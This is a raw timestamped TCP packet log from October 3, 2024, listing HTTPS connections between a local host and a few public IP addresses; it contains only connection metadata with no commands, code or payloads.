                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835285902 CEST49854443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835313082 CEST44349854104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835366011 CEST49854443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835429907 CEST44349854104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835484982 CEST49854443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835789919 CEST44349854104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835854053 CEST49854443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835872889 CEST44349854104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835907936 CEST44349854104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.835952997 CEST49854443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.839941025 CEST49854443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:27.839961052 CEST44349854104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.020657063 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.113126993 CEST49856443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.156441927 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.162862062 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.253139973 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.275377989 CEST49857443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.275414944 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.308877945 CEST49855443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.338449001 CEST49856443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.338484049 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.338782072 CEST49855443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.338797092 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.338992119 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.338996887 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.339137077 CEST49857443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.339140892 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.339157104 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.339530945 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.339698076 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.339960098 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.340209961 CEST49856443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.340301037 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.340874910 CEST49855443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.341069937 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.341392994 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.341478109 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.342036963 CEST49857443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.342164993 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.342375994 CEST49856443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.342464924 CEST49855443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.342529058 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.342890024 CEST49857443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.383429050 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.383455038 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.383474112 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.387401104 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445707083 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445739985 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445755959 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445810080 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445821047 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445822954 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445852995 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445878029 CEST49857443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445893049 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445911884 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445916891 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445969105 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.445975065 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446280956 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446335077 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446341038 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446556091 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446604013 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446610928 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446892977 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.446994066 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.447076082 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.447132111 CEST49856443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.447612047 CEST49856443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.447627068 CEST44349856104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.450670004 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.450746059 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.450752020 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533500910 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533530951 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533597946 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533684015 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533684015 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533720016 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533797979 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533833981 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533878088 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533884048 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533891916 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.533920050 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.534651041 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.534687042 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.534706116 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.534713984 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.534759998 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.534766912 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535516024 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535542965 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535573959 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535579920 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535634041 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535636902 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535644054 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.535684109 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.536339045 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.536392927 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.536425114 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.536473989 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.536487103 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.536498070 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.536546946 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.537143946 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.537206888 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.537224054 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.564630032 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.564811945 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.565175056 CEST49855443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.569175959 CEST49855443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.569209099 CEST4434985579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.572632074 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.572671890 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.572781086 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.573574066 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.573589087 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576064110 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576116085 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576211929 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576440096 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576524019 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576616049 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576905966 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576926947 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.576997995 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.577352047 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.577372074 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.577507973 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.577544928 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.577646017 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.577671051 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.579215050 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.607351065 CEST49857443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.607371092 CEST44349857104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.620966911 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621083975 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621172905 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621186972 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621272087 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621448040 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621454954 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621767998 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621829987 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621835947 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621876955 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621906042 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621956110 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621961117 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.621998072 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.622354984 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.622462034 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.622555017 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.622595072 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.622612953 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.622648954 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.622678995 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.623753071 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.623852015 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.623872042 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.623945951 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.623991013 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.624010086 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.624034882 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.624274969 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.624331951 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.624342918 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.624396086 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712064981 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712116003 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712151051 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712165117 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712198019 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712224007 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712591887 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712694883 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712713957 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.712771893 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713393927 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713464975 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713490963 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713514090 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713536978 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713557959 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713599920 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.713676929 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.827440977 CEST49858443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.827502966 CEST44349858104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.828603983 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.828658104 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.828752995 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.829006910 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.829025984 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.862659931 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.862730980 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.862790108 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.863615990 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.863631010 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.869137049 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.869206905 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.869405985 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.869611025 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:28.869642019 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.036458015 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.036928892 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.036990881 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.037477970 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038047075 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038136959 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038184881 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038278103 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038321018 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038384914 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038398981 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038568020 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.038611889 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.243366957 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.243733883 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.243781090 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.244254112 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.244671106 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.244765043 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.244832039 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.248933077 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.249649048 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.249710083 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.250402927 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.250813961 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.250909090 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.251029968 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289485931 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289547920 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289589882 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289639950 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289657116 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289701939 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289757967 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289776087 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.289989948 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.290002108 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.290342093 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.290381908 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.290433884 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.290447950 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.290537119 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.291413069 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.294540882 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.295407057 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.304231882 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.308387995 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.308424950 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.308883905 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.309300900 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.309375048 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.309566975 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.336704016 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.336960077 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.336997032 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.337477922 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.337833881 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.337917089 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.337968111 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.355405092 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.377645969 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.377715111 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.377728939 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.378695011 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.378745079 CEST49861443192.168.2.4104.18.94.41
